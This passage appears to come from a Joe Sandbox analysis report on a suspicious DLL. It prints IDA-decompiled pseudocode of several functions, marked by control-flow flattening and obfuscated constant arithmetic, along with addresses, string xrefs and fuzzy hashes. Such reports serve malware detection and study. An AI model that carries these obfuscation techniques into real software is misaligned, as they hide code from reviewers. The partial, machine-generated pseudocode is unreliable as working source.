									_t223 = E100054FB(_t196);
									if(_t223 != 0) {
										E10006374(_v32, _t223, _t219, _t188, _v36);
										E1000DE81(_v72, _t188, _v76);
										_t224 = _t219;
										_t174 = _t223 + _t219;
										_t219 = _v12;
										_t225 =  &(_t225[4]);
										_v28 = _t174;
										_t188 = _t223;
										if(_t224 != 0) {
											goto L7;
										}
									}
								}
							}
						}
						break;
						L15:
						_t174 = _v28;
					} while (_t221 != 0x2a69df6d);
					L16:
					_t222 = _v20;
					if(_t222 != 0) {
						_t178 = _v8;
						 *_t178 = _t188;
						 *((intOrPtr*)(_t178 + 4)) = _t219 - _t224;
					} else {
						E1000DE81(_v64, _t188, _v68);
					}
					return _t222;
				}
			}

0x10009d2f
0x10009d2f
0x10009d36
0x10009d3a
0x10009d3e
0x10009d46
0x10009d52
0x10009d5b
0x10009d60
0x10009d65
0x10009d6b
0x10009d73
0x10009d7b
0x10009d87
0x10009d8c
0x10009d92
0x10009d9a
0x10009da2
0x10009daa
0x10009db2
0x10009dba
0x10009dc2
0x10009dca
0x10009dcf
0x10009dd7
0x10009ddf
0x10009de7
0x10009df4
0x10009df5
0x10009df9
0x10009dfe
0x10009e06
0x10009e0e
0x10009e13
0x10009e1b
0x10009e23
0x10009e31
0x10009e3a
0x10009e3e
0x10009e46
0x10009e4e
0x10009e56
0x10009e5e
0x10009e66
0x10009e6e
0x10009e76
0x10009e7e
0x10009e86
0x10009e8b
0x10009e93
0x10009e9b
0x10009ea8
0x10009eac
0x10009eb1
0x10009eb6
0x10009ebe
0x10009ec6
0x10009ecb
0x10009ed3
0x10009edb
0x10009ee3
0x10009eeb
0x10009efb
0x10009efe
0x10009f02
0x10009f06
0x10009f0a
0x10009f0e
0x10009f13
0x10009f1b
0x10009f28
0x10009f2c
0x10009f34
0x10009f3c
0x00000000
0x10009f40
0x10009f40
0x10009f40
0x10009f4e
0x10009f67
0x10009f72
0x10009f73
0x10009f78
0x10009f7d
0x10009f83
0x10009f87
0x10009f89
0x10009f89
0x10009f8d
0x00000000
0x10009f8d
0x10009f50
0x10009f56
0x00000000
0x10009f5c
0x10009f5c
0x00000000
0x10009f5c
0x10009f56
0x00000000
0x10009f4e
0x10009fac
0x10009fae
0x10009fb1
0x10009fb7
0x1000a028
0x1000a028
0x1000a02c
0x00000000
0x10009fb9
0x10009fb9
0x10009fbf
0x00000000
0x10009fc1
0x10009fc5
0x10009fc7
0x10009fcb
0x10009fcd
0x00000000
0x10009fcf
0x10009fd3
0x10009fdc
0x10009fdd
0x10009fe6
0x10009feb
0x10009ff9
0x1000a008
0x1000a00d
0x1000a00f
0x1000a012
0x1000a016
0x1000a019
0x1000a01d
0x1000a021
0x00000000
0x1000a023
0x1000a021
0x10009feb
0x10009fcd
0x10009fbf
0x00000000
0x1000a031
0x1000a031
0x1000a035
0x1000a041
0x1000a041
0x1000a047
0x1000a05f
0x1000a065
0x1000a067
0x1000a049
0x1000a053
0x1000a05c
0x1000a073
0x1000a073

Strings

dP, xrefs: 10009DFE
:X, xrefs: 10009E3E
G, xrefs: 10009EE3

Memory Dump Source

Source File: 00000000.00000002.341944318.0000000010000000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.341992507.0000000010020000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.341998147.0000000010022000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: :X$G$dP
API String ID: 0-1717702412
Opcode ID: 0a730519cfd8e6b6f762032c559e3e7c70812bbcb69a7fffbabd17b92223504c
Instruction ID: 1d88afdfda8eef0ec8ea591d55a035561c0abba33e37d4709a1c56cdb5941b86
Opcode Fuzzy Hash: 0a730519cfd8e6b6f762032c559e3e7c70812bbcb69a7fffbabd17b92223504c
Instruction Fuzzy Hash: C69140716083428FD348CF29C48540FBBE1FBC4798F408A2EF596A7260C7B5DA498F82

Uniqueness

Uniqueness Score: -1.00%

Function 1001135B Relevance: 3.9, Strings: 3, Instructions: 158
COMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E1001135B(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				void* _t142;
				void* _t164;
				void* _t167;
				signed int _t181;
				signed int _t182;
				signed int _t183;
				void* _t185;
				signed int* _t188;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E10012550(_t142);
				_v68 = 0xf6fd;
				_t188 =  &(( &_v68)[5]);
				_t185 = 0;
				_t167 = 0x120b6438;
				_t181 = 0x37;
				_v68 = _v68 / _t181;
				_t182 = 6;
				_v68 = _v68 * 0x52;
				_v68 = _v68 + 0xcd83;
				_v68 = _v68 ^ 0x00023d8c;
				_v12 = 0xd60a;
				_v12 = _v12 + 0xd6ec;
				_v12 = _v12 ^ 0x0001acf7;
				_v32 = 0xa29f;
				_v32 = _v32 ^ 0x4f38ff35;
				_v32 = _v32 ^ 0x0f385daa;
				_v40 = 0xdb0c;
				_v40 = _v40 << 0xc;
				_v40 = _v40 | 0xd75e623d;
				_v40 = _v40 ^ 0x9ffee23d;
				_v48 = 0x5711;
				_v48 = _v48 >> 0xb;
				_v48 = _v48 + 0x4c96;
				_v48 = _v48 ^ 0x0000622c;
				_v28 = 0x2a8d;
				_v28 = _v28 ^ 0x2576f3ca;
				_v28 = _v28 ^ 0x2576c47f;
				_v52 = 0x1d31;
				_v52 = _v52 | 0x18ed216c;
				_v52 = _v52 * 0x26;
				_v52 = _v52 ^ 0xb3370705;
				_v36 = 0x506d;
				_v36 = _v36 << 1;
				_v36 = _v36 ^ 0x0000af41;
				_v56 = 0xd618;
				_v56 = _v56 + 0x2bfb;
				_v56 = _v56 / _t182;
				_v56 = _v56 ^ 0x00007f84;
				_v20 = 0x7a02;
				_v20 = _v20 + 0xffff09b4;
				_v20 = _v20 ^ 0xffffb01c;
				_v24 = 0x46f3;
				_v24 = _v24 << 0xe;
				_v24 = _v24 ^ 0x11bc9893;
				_v60 = 0xd2ca;
				_v60 = _v60 | 0xbe7a55a5;
				_v60 = _v60 << 8;
				_v60 = _v60 + 0xffffc5fa;
				_v60 = _v60 ^ 0x7ad789b6;
				_v8 = 0x5705;
				_v8 = _v8 + 0xffff783c;
				_v8 = _v8 ^ 0xfffff995;
				_v64 = 0x2f3b;
				_v64 = _v64 >> 6;
				_v64 = _v64 + 0x79a7;
				_t183 = 0x7a;
				_v64 = _v64 / _t183;
				_v64 = _v64 ^ 0x00001190;
				_v16 = 0x22f9;
				_v16 = _v16 | 0x259e41a8;
				_v16 = _v16 ^ 0x259e7296;
				_v44 = 0x5159;
				_v44 = _v44 | 0xb37bb685;
				_v44 = _v44 ^ 0x9f6900dd;
				_v44 = _v44 ^ 0x2c12c002;
				while(_t167 != 0x120b6438) {
					if(_t167 == 0x257cf60e) {
						E10004282(_v60, _v8, _v64, _a8, _t185, _v40 | _v12,  &_v4, _v16, _v44, _a4);
					} else {
						if(_t167 == 0x2df92bb4) {
							_push(_t167);
							_t185 = E100054FB(_v4 + _v4);
							if(_t185 != 0) {
								_t167 = 0x257cf60e;
								continue;
							}
						} else {
							if(_t167 != 0x39df0674) {
								L10:
								if(_t167 != 0x1bf2cd07) {
									continue;
								} else {
								}
							} else {
								_t164 = E10004282(_v48, _v28, _v52, _a8, 0, _v32 | _v68,  &_v4, _v36, _v56, _a4);
								_t188 =  &(_t188[8]);
								if(_t164 != 0) {
									_t167 = 0x2df92bb4;
									continue;
								}
							}
						}
					}
					return _t185;
				}
				_t167 = 0x39df0674;
				goto L10;
			}

0x10011362
0x10011366
0x1001136a
0x1001136e
0x1001136f
0x10011370
0x10011375
0x1001137d
0x10011386
0x10011388
0x1001138f
0x10011394
0x1001139f
0x100113a2
0x100113a6
0x100113ae
0x100113b6
0x100113be
0x100113c6
0x100113ce
0x100113d6
0x100113de
0x100113e6
0x100113ee
0x100113f3
0x100113fb
0x10011403
0x1001140b
0x10011410
0x10011418
0x10011420
0x10011428
0x10011430
0x10011438
0x10011440
0x1001144d
0x10011451
0x10011459
0x10011461
0x10011465
0x1001146d
0x10011475
0x10011485
0x10011489
0x10011491
0x10011499
0x100114a1
0x100114a9
0x100114b1
0x100114b6
0x100114be
0x100114c6
0x100114ce
0x100114d3
0x100114db
0x100114e3
0x100114eb
0x100114f3
0x100114fb
0x10011503
0x10011508
0x10011514
0x10011517
0x1001151b
0x10011528
0x10011535
0x10011542
0x1001154a
0x10011552
0x1001155a
0x10011562
0x1001156a
0x10011574
0x10011611
0x10011576
0x10011578
0x100115c6
0x100115cf
0x100115d4
0x100115d6
0x00000000
0x100115d6
0x1001157a
0x1001157c
0x100115dc
0x100115e2
0x00000000
0x00000000
0x100115e4
0x1001157e
0x100115aa
0x100115af
0x100115b4
0x100115b6
0x00000000
0x100115b6
0x100115b4
0x1001157c
0x10011578
0x10011622
0x10011622
0x100115da
0x00000000

Strings

;/, xrefs: 100114FB
mP, xrefs: 10011459
YQ, xrefs: 1001154A

Memory Dump Source

Source File: 00000000.00000002.341944318.0000000010000000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.341992507.0000000010020000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.341998147.0000000010022000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: ;/$YQ$mP
API String ID: 0-3666080072
Opcode ID: 47880b2951c1e1c441204921e8a5573947b7b5d1dd38183dfbb91e3983d3d2ca
Instruction ID: 3968c2a36817a5a76b900b78d6df10d5d698fb05076d528fea6295023e58cee3
Opcode Fuzzy Hash: 47880b2951c1e1c441204921e8a5573947b7b5d1dd38183dfbb91e3983d3d2ca
Instruction Fuzzy Hash: C07131B11093419BD358CF65C88981FBBF2FBC4798F504A1DF59696260D3B6CA48CB47

Uniqueness

Uniqueness Score: -1.00%

Function 1000C145 Relevance: 3.9, Strings: 3, Instructions: 146
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E1000C145(void* __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				void* _v72;
				intOrPtr _v76;
				void* _t158;
				void* _t162;
				signed int _t164;
				signed int _t165;
				signed int _t166;
				intOrPtr* _t187;
				signed int _t188;
				intOrPtr* _t189;
				void* _t190;

				_v76 = 0x4e59b3;
				asm("stosd");
				_t162 = __ecx;
				_push("true");
				_pop(_t164);
				asm("stosd");
				_t188 = 9;
				asm("stosd");
				_v12 = 0xc9c5;
				_t187 = 0x10021084;
				_v12 = _v12 >> 0xb;
				_v12 = _v12 * 0x7d;
				_v12 = _v12 * 0x52;
				_v12 = _v12 ^ 0x0003e898;
				_v8 = 0x326b;
				_v8 = _v8 ^ 0x4a0ebab0;
				_v8 = _v8 * 0x1a;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 ^ 0x0008366f;
				_v40 = 0x35fc;
				_v40 = _v40 | 0x4fdc2f8a;
				_v40 = _v40 ^ 0x4fdc2023;
				_v48 = 0xbcdb;
				_v48 = _v48 + 0x5d48;
				_v48 = _v48 ^ 0x00014504;
				_v20 = 0xc333;
				_v20 = _v20 << 6;
				_v20 = _v20 + 0xab7c;
				_v20 = _v20 ^ 0x90b5416b;
				_v20 = _v20 ^ 0x90846b09;
				_v44 = 0xaf61;
				_v44 = _v44 >> 0xf;
				_v44 = _v44 ^ 0x0000016e;
				_v32 = 0xeeb1;
				_v32 = _v32 / _t164;
				_v32 = _v32 << 2;
				_v32 = _v32 ^ 0x0000131e;
				_v56 = 0x101;
				_v56 = _v56 << 7;
				_v56 = _v56 ^ 0x0000810a;
				_v24 = 0x5cc;
				_v24 = _v24 << 0xb;
				_t165 = 0x68;
				_v24 = _v24 * 0x53;
				_v24 = _v24 / _t188;
				_v24 = _v24 ^ 0x01abf608;
				_v36 = 0x9340;
				_v36 = _v36 << 4;
				_v36 = _v36 * 0x3d;
				_v36 = _v36 ^ 0x02311cdc;
				_v52 = 0xb9f4;
				_v52 = _v52 << 0xc;
				_v52 = _v52 ^ 0x0b9f20c2;
				_v28 = 0x28eb;
				_v28 = _v28 << 0xb;
				_v28 = _v28 << 5;
				_v28 = _v28 >> 3;
				_v28 = _v28 ^ 0x051d1262;
				_v60 = 0xd87b;
				_v60 = _v60 / _t165;
				_v60 = _v60 ^ 0x00004114;
				_v16 = 0x63a3;
				_v16 = _v16 ^ 0x0cdbf93f;
				_t166 = 0x44;
				_v16 = _v16 / _t166;
				_v16 = _v16 / _t188;
				_v16 = _v16 ^ 0x000560e1;
				_t189 =  *0x10021084;
				while(_t189 != 0) {
					if( *((intOrPtr*)(_t189 + 8)) == 0) {
						L4:
						 *_t187 =  *_t189;
						_t158 = E1000DE81(_v28, _t189, _v60);
					} else {
						_t158 = E1001C631(_v12, _t162,  *((intOrPtr*)(_t189 + 0x28)), _v8, _v40);
						_t190 = _t190 + 0xc;
						if(_t158 != _v16) {
							_t187 = _t189;
						} else {
							 *((intOrPtr*)(_t189 + 0x18))( *((intOrPtr*)(_t189 + 8)), 0, 0);
							E1001A8BF(_v48, _v20, _v44, _v32,  *((intOrPtr*)(_t189 + 8)));
							E1000F1ED(_v56, _v24, _v36, _v52,  *((intOrPtr*)(_t189 + 0x28)));
							_t190 = _t190 + 0x18;
							goto L4;
						}
					}
					_t189 =  *_t187;
				}
				return _t158;
			}

0x1000c14b
0x1000c15c
0x1000c15d
0x1000c15f
0x1000c161
0x1000c164
0x1000c165
0x1000c168
0x1000c169
0x1000c170
0x1000c175
0x1000c17d
0x1000c184
0x1000c187
0x1000c18e
0x1000c195
0x1000c1a0
0x1000c1a3
0x1000c1a7
0x1000c1ae
0x1000c1b5
0x1000c1bc
0x1000c1c3
0x1000c1ca
0x1000c1d1
0x1000c1d8
0x1000c1df
0x1000c1e3
0x1000c1ea
0x1000c1f1
0x1000c1f8
0x1000c1ff
0x1000c203
0x1000c20a
0x1000c218
0x1000c21b
0x1000c21f
0x1000c226
0x1000c22d
0x1000c231
0x1000c238
0x1000c23f
0x1000c247
0x1000c248
0x1000c252
0x1000c255
0x1000c25c
0x1000c263
0x1000c26b
0x1000c26e
0x1000c275
0x1000c27c
0x1000c280
0x1000c287
0x1000c28e
0x1000c292
0x1000c296
0x1000c29a
0x1000c2a1
0x1000c2ad
0x1000c2b0
0x1000c2b9
0x1000c2c0
0x1000c2cc
0x1000c2d1
0x1000c2d9
0x1000c2dc
0x1000c2e3
0x1000c355
0x1000c2ef
0x1000c341
0x1000c34b
0x1000c34d
0x1000c2f1
0x1000c2ff
0x1000c304
0x1000c30a
0x1000c360
0x1000c30c
0x1000c313
0x1000c325
0x1000c339
0x1000c33e
0x00000000
0x1000c33e
0x1000c30a
0x1000c353
0x1000c353
0x1000c35f

Strings

(, xrefs: 1000C287
H], xrefs: 1000C1CA
k2, xrefs: 1000C18E

Memory Dump Source

Source File: 00000000.00000002.341944318.0000000010000000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.341992507.0000000010020000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.341998147.0000000010022000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: H]$k2$(
API String ID: 0-1078215326
Opcode ID: 476eaf23f9380be9f79b190be98bc6f815e6030c1329441ee809d7870b2c4736
Instruction ID: bece9be8499f6d5f3f5d8792763f9a721af79ad47b459cae3214e468ff71a78d
Opcode Fuzzy Hash: 476eaf23f9380be9f79b190be98bc6f815e6030c1329441ee809d7870b2c4736
Instruction Fuzzy Hash: F4610271D00209EBEB09CFA5D98A5DEFBB2FB48354F208059D511B6260C7B95A85CF94

Uniqueness

Uniqueness Score: -1.00%

Function 1000F5E0 Relevance: 3.9, Strings: 3, Instructions: 135
COMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E1000F5E0(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				void* _t108;
				void* _t120;
				signed int _t126;
				signed int _t127;
				signed int _t128;
				void* _t131;
				void* _t148;
				signed int* _t151;

				_push(_a16);
				_t147 = _a8;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E10012550(_t108);
				_v100 = 0xbd2b;
				_t151 =  &(( &_v108)[6]);
				_v100 = _v100 + 0xc830;
				_v100 = _v100 ^ 0xf25ece92;
				_t148 = 0;
				_v100 = _v100 ^ 0x67839fcf;
				_t131 = 0x1bb8a706;
				_v100 = _v100 ^ 0x95dca476;
				_v104 = 0xe5f5;
				_v104 = _v104 ^ 0x3a2ce663;
				_v104 = _v104 + 0x2b7;
				_v104 = _v104 + 0xfffff7b7;
				_v104 = _v104 ^ 0x3a2bd932;
				_v108 = 0xdd91;
				_t126 = 0x78;
				_v108 = _v108 / _t126;
				_v108 = _v108 << 3;
				_v108 = _v108 | 0x72d1b8ea;
				_v108 = _v108 ^ 0x72d1fa04;
				_v76 = 0xd4ee;
				_t127 = 0x31;
				_v76 = _v76 * 0x6a;
				_v76 = _v76 ^ 0x0058075c;
				_v84 = 0x2487;
				_v84 = _v84 << 0xd;
				_v84 = _v84 / _t127;
				_v84 = _v84 ^ 0x0017b008;
				_v96 = 0x31db;
				_v96 = _v96 ^ 0x255ec927;
				_v96 = _v96 + 0x2f88;
				_v96 = _v96 >> 0x10;
				_v96 = _v96 ^ 0x000038c6;
				_v72 = 0x5e58;
				_v72 = _v72 + 0xffff066f;
				_v72 = _v72 ^ 0xffff345d;
				_v80 = 0x2e99;
				_v80 = _v80 | 0xfff3fbee;
				_v80 = _v80 ^ 0xfff3b346;
				_v88 = 0x63de;
				_t128 = 0x6e;
				_v88 = _v88 / _t128;
				_v88 = _v88 >> 7;
				_v88 = _v88 + 0x451f;
				_v88 = _v88 ^ 0x0000098b;
				_v92 = 0x3ecb;
				_v92 = _v92 * 0x6a;
				_v92 = _v92 * 0x70;
				_v92 = _v92 * 0x17;
				_v92 = _v92 ^ 0x05a0db37;
				do {
					while(_t131 != 0x2106865) {
						if(_t131 == 0x1bb8a706) {
							_t131 = 0x222f3472;
							continue;
						} else {
							if(_t131 == 0x222f3472) {
								E1000FEE3(_a12,  &_v68, _v100, _v104, _v108, _v76);
								_t151 =  &(_t151[4]);
								_t131 = 0x2106865;
								continue;
							} else {
								_t157 = _t131 - 0x2cd0632e;
								if(_t131 != 0x2cd0632e) {
									goto L12;
								} else {
									E1000F914(_v72, _v80, _t157, _v88, _t147 + 4, _v92,  &_v68);
									_t148 =  !=  ? 1 : _t148;
								}
							}
						}
						L6:
						return _t148;
					}
					_t120 = E1000BAA2( &_v68, _v84, _v96, _t147);
					_t151 =  &(_t151[2]);
					__eflags = _t120;
					if(__eflags == 0) {
						_t131 = 0x9b007f1;
						goto L12;
					} else {
						_t131 = 0x2cd0632e;
						continue;
					}
					goto L6;
					L12:
					__eflags = _t131 - 0x9b007f1;
				} while (__eflags != 0);
				goto L6;
			}

0x1000f5e7
0x1000f5ee
0x1000f5f5
0x1000f5fc
0x1000f5fd
0x1000f604
0x1000f605
0x1000f606
0x1000f60b
0x1000f613
0x1000f616
0x1000f620
0x1000f628
0x1000f62a
0x1000f632
0x1000f637
0x1000f644
0x1000f64c
0x1000f654
0x1000f65c
0x1000f664
0x1000f66c
0x1000f67a
0x1000f67f
0x1000f685
0x1000f68a
0x1000f692
0x1000f69a
0x1000f6a7
0x1000f6aa
0x1000f6ae
0x1000f6b6
0x1000f6be
0x1000f6cb
0x1000f6cf
0x1000f6d7
0x1000f6df
0x1000f6e7
0x1000f6ef
0x1000f6f4
0x1000f6fc
0x1000f704
0x1000f70c
0x1000f714
0x1000f71c
0x1000f724
0x1000f72c
0x1000f738
0x1000f740
0x1000f744
0x1000f749
0x1000f751
0x1000f759
0x1000f766
0x1000f76f
0x1000f778
0x1000f77c
0x1000f784
0x1000f784
0x1000f792
0x1000f7fd
0x00000000
0x1000f794
0x1000f796
0x1000f7ee
0x1000f7f3
0x1000f7f6
0x00000000
0x1000f798
0x1000f798
0x1000f79a
0x00000000
0x1000f7a0
0x1000f7b9
0x1000f7c6
0x1000f7c6
0x1000f79a
0x1000f796
0x1000f7ca
0x1000f7d2
0x1000f7d2
0x1000f80e
0x1000f813
0x1000f816
0x1000f818
0x1000f821
0x00000000
0x1000f81a
0x1000f81a
0x00000000
0x1000f81a
0x00000000
0x1000f826
0x1000f826
0x1000f826
0x00000000

Strings

r4/", xrefs: 1000F73B
X^, xrefs: 1000F6FC
c,:, xrefs: 1000F64C

Memory Dump Source

Source File: 00000000.00000002.341944318.0000000010000000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.341992507.0000000010020000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.341998147.0000000010022000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: X^$c,:$r4/"
API String ID: 0-1154924512
Opcode ID: ee755c4278271f96210a97fe9531c3849dfc2dbf006185a258316c46e1c648fd
Instruction ID: 73649858d48a772985079d5aa35fa6e5fbf1c92c2c5846924a768ae8fca5e955
Opcode Fuzzy Hash: ee755c4278271f96210a97fe9531c3849dfc2dbf006185a258316c46e1c648fd
Instruction Fuzzy Hash: 835158711083829BE754CE20C58A91FBBF5FBC8748F504A1DF4C9966A0D7759A09CB93

Uniqueness

Uniqueness Score: -1.00%

Function 10003FAF Relevance: 3.9, Strings: 3, Instructions: 118
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E10003FAF() {
				signed char _v2;
				signed int _v276;
				signed int _v280;
				char _v284;
				signed short _v320;
				intOrPtr _v324;
				intOrPtr _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				void* _t97;
				signed int _t111;
				signed int _t112;
				signed int _t113;
				intOrPtr _t115;
				signed int* _t117;

				_t117 =  &_v356;
				_v328 = 0x3138;
				_t115 = 0;
				_t97 = 0x33d529cc;
				_v324 = 0;
				_v344 = 0x9123;
				_v344 = _v344 | 0x5a808bd5;
				_v344 = _v344 + 0xeb06;
				_v344 = _v344 ^ 0x5a818485;
				_v340 = 0xc804;
				_t111 = 0x44;
				_v340 = _v340 * 0x5f;
				_v340 = _v340 | 0x7b6fdd9e;
				_v340 = _v340 ^ 0x7b6fb88e;
				_v348 = 0x9154;
				_v348 = _v348 / _t111;
				_v348 = _v348 + 0x2621;
				_v348 = _v348 >> 7;
				_v348 = _v348 ^ 0x00001b68;
				_v336 = 0x690d;
				_v336 = _v336 >> 0xa;
				_v336 = _v336 ^ 0x0000404b;
				_v356 = 0x945a;
				_v356 = _v356 >> 0x10;
				_v356 = _v356 << 9;
				_t112 = 0x5d;
				_v356 = _v356 / _t112;
				_v356 = _v356 ^ 0x00005b50;
				_v332 = 0xb02a;
				_t113 = 0x60;
				_v332 = _v332 / _t113;
				_v332 = _v332 ^ 0x000056d0;
				_v352 = 0x389b;
				_v352 = _v352 * 0x54;
				_v352 = _v352 << 0xf;
				_v352 = _v352 + 0xffffdcc7;
				_v352 = _v352 ^ 0x496daad3;
				do {
					while(_t97 != 0xe09bda3) {
						if(_t97 == 0x15edbb33) {
							_t97 = 0x37fd0e9f;
							_t115 = _t115 + _v276 * 0x64;
							continue;
						} else {
							if(_t97 == 0x1cbb7e54) {
								_t97 = 0x2caaacac;
								_t115 = _t115 + (_v2 & 0x000000ff) * 0x186a0;
								continue;
							} else {
								if(_t97 == 0x213f0da0) {
									E1000B9F2( &_v320, _v356, _v332, _v352);
									_t97 = 0x1cbb7e54;
									continue;
								} else {
									if(_t97 == 0x2caaacac) {
										_t97 = 0x15edbb33;
										_t115 = _t115 + _v280 * 0x3e8;
										continue;
									} else {
										if(_t97 == 0x33d529cc) {
											_t97 = 0xe09bda3;
											continue;
										} else {
											if(_t97 != 0x37fd0e9f) {
												goto L16;
											} else {
												_t115 = _t115 + (_v320 & 0x0000ffff);
											}
										}
									}
								}
							}
						}
						L9:
						return _t115;
					}
					_v284 = 0x11c;
					E1001279F(_v344, _v340, _v348, _v336,  &_v284);
					_t117 =  &(_t117[3]);
					_t97 = 0x213f0da0;
					L16:
				} while (_t97 != 0x23841290);
				goto L9;
			}

0x10003faf
0x10003fb5
0x10003fc2
0x10003fc4
0x10003fc9
0x10003fd2
0x10003fdf
0x10003fe7
0x10003fef
0x10003ff7
0x10004007
0x1000400a
0x1000400e
0x10004016
0x1000401e
0x1000402e
0x10004032
0x1000403a
0x1000403f
0x10004047
0x1000404f
0x10004054
0x1000405c
0x10004064
0x10004069
0x10004072
0x10004077
0x1000407d
0x10004085
0x10004091
0x10004099
0x1000409d
0x100040a5
0x100040b2
0x100040b6
0x100040bb
0x100040c3
0x100040cb
0x100040cb
0x100040d5
0x10004166
0x10004168
0x00000000
0x100040db
0x100040e1
0x1000414f
0x1000415a
0x00000000
0x100040e3
0x100040e9
0x10004139
0x10004140
0x00000000
0x100040eb
0x100040f1
0x10004123
0x10004125
0x00000000
0x100040f3
0x100040f9
0x10004117
0x00000000
0x100040fb
0x100040fd
0x00000000
0x10004103
0x10004108
0x10004108
0x100040fd
0x100040f9
0x100040f1
0x100040e9
0x100040e1
0x1000410b
0x10004116
0x10004116
0x10004173
0x1000418c
0x10004191
0x10004194
0x10004199
0x10004199
0x00000000

Strings

!&, xrefs: 10004032
K@, xrefs: 10004054
P[, xrefs: 1000407D

Memory Dump Source

Source File: 00000000.00000002.341944318.0000000010000000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.341992507.0000000010020000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.341998147.0000000010022000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: !&$K@$P[
API String ID: 0-2917137494
Opcode ID: 5b4b2cc8b968ca566717441e5ac86746a7073d49ca386277a7409c9bdfb8209a
Instruction ID: 78a8ffbac7d008b369627a89409f5e18179ffb697b960e0e0eb6bcac580310fc
Opcode Fuzzy Hash: 5b4b2cc8b968ca566717441e5ac86746a7073d49ca386277a7409c9bdfb8209a
Instruction Fuzzy Hash: AD41CAB06083028BE308CF25D48506FFBE1EBC4798F104A1EF585A62A4D774DA4A8F97

Uniqueness

Uniqueness Score: -1.00%

Function 100035FC Relevance: 3.9, Strings: 3, Instructions: 101
COMMONCrypto

Download Yara Rule

C-Code - Quality: 79%

			E100035FC(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				unsigned int _v48;
				signed int _v52;
				void* _t106;
				signed int _t118;
				signed int _t119;

				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E10012550(_t106);
				_v24 = 0x9798;
				_v24 = _v24 + 0xffffbd22;
				_v24 = _v24 + 0x641e;
				_v24 = _v24 ^ 0x0000a020;
				_v36 = 0x61df;
				_t118 = 0x59;
				_v36 = _v36 * 0x26;
				_v36 = _v36 ^ 0x000edcfe;
				_v32 = 0xcd5;
				_v32 = _v32 ^ 0xf6eb11a6;
				_v32 = _v32 ^ 0xf6eb5e3d;
				_v28 = 0x5819;
				_v28 = _v28 | 0xf42f747a;
				_v28 = _v28 ^ 0xf42f4692;
				_v48 = 0xdcf0;
				_v48 = _v48 >> 4;
				_v48 = _v48 ^ 0x00002f29;
				_v44 = 0x97e5;
				_t119 = 0x6a;
				_v44 = _v44 / _t118;
				_v44 = _v44 ^ 0x00000ed0;
				_v12 = 0xa421;
				_v12 = _v12 | 0x274c75f9;
				_v12 = _v12 + 0x5ba7;
				_v12 = _v12 << 0xa;
				_v12 = _v12 ^ 0x3546b17c;
				_v40 = 0x78dd;
				_v40 = _v40 >> 0xd;
				_v40 = _v40 ^ 0x00007b97;
				_v8 = 0xdcde;
				_v8 = _v8 | 0x90b63865;
				_v8 = _v8 + 0xeb12;
				_push(0x100013dc);
				_v8 = _v8 * 0x27;
				_v8 = _v8 ^ 0x0c047073;
				_v20 = 0xf013;
				_v20 = _v20 ^ 0x6a2eccf0;
				_v20 = _v20 << 7;
				_v20 = _v20 >> 7;
				_v20 = _v20 ^ 0x002e686d;
